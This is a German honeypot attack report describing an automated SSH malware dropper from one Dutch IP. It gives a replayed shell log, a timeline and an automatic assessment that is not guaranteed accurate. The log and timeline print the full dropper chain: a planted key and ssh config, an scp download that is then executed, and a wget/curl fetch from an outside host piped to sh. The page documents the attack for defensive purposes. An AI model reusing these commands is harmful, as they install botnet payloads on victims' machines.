ALLSmartSecurity
Angriffsfall

Malware-Dropper: 3 Sitzungen von 1 IP, Marker auth_ok

29.09.2026 · Malware-Dropper · 3 Anfragen · Dauer keine Angabe · Niederlande

Überblick

Klassifizierung
Malware-Dropper
Angriffsmuster
shell_session, Dropper, Recon
Herkunft
Niederlande · Omegatech LTD

3 verschiedene Sitzungen (3 Durchläufe) von 1 IPs, Länder: NL (3). Dienst: ssh/22. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.

Erkannte Signaturen

Dekodierte Payloads

auth_ok

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
Linux router 5.4.179 #0 SMP PREEMPT mips GNU/Linux
auth_ok
-----BEGIN OPENSSH PRIVATE KEY-----
auth_ok
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s ssh; fi; rm -rf sshcfg key.ppk out_sh
scp: invalid option -- 's'
usage: scp [-12346Cpqrv] [-B buffer_size] [-E tag_file] [-F ssh_config]
           [-i identity_file] [-J destination] [-l limit] [-o ssh_option]
           [-P port] [-S program] source ... target

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer führte drei Sitzungen durch, in denen er sich mit den Standardzugangsdaten admin:admin anmeldete. Nach der erfolgreichen Authentifizierung erstellte er im temporären Verzeichnis eine Datei mit einem vorgetäuschten SSH-Schlüssel. Anschließend konfigurierte er SSH so, dass Host-Prüfungen übersprungen werden, und versuchte, eine Datei von einem externen Server herunterzuladen. Bei Erfolg sollte diese Datei ausgeführt werden, andernfalls wurde ein alternativer Download über wget eingeleitet.

Was die Befehle bewirken

Der Befehl uname -a liefert Systeminformationen zur Identifikation der Umgebung. Der Echo-Befehl schreibt eine Hexadezimal-Kette, die dem String auth_ok entspricht, was als Bestätigung der Anmeldung dient. Die cd-Befehle wechseln in beschreibbare temporäre Verzeichnisse wie /tmp, um Schreibrechte zu umgehen. Die mehrzeilige Echo-Anweisung erzeugt eine Datei namens key.ppk, die jedoch keinen echten Schlüssel enthält, sondern als Platzhalter oder Tarnung dient. Die Datei sshcfg deaktiviert die strenge Host-Key-Prüfung, um Man-in-the-Middle-Angriffe oder Warnungen zu umgehen. Der scp-Befehl versucht, eine Datei namens out_sh vom externen Server zu kopieren, und führt sie bei Erfolg mit sh aus, was zur Ausführung beliebigen Codes führt.

Worauf es hinauslief

Das Ziel war die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten System. Dies erkennt man an der Kombination aus Brute-Force-Anmeldung, dem Anlegen von SSH-Konfigurationsdateien und dem Versuch, einen zweiten Payload aus dem Internet nachzuladen. Der fehlgeschlagene Nachladen-Versuch deutet darauf hin, dass der eigentliche Schadcode nicht ausgeführt wurde.

Einordnung

Dieses Muster ist ein typischer, automatisierter Dropper-Angriff, der häufig in Botnetzen zur Massenkompromittierung von IoT-Geräten oder schwach gesicherten Servern eingesetzt wird.

Ablauf

(4 von 3, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sCMDuname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
+0 sCMD[Token]
+0 sCMD-----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
+0 sCMDUserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s ssh;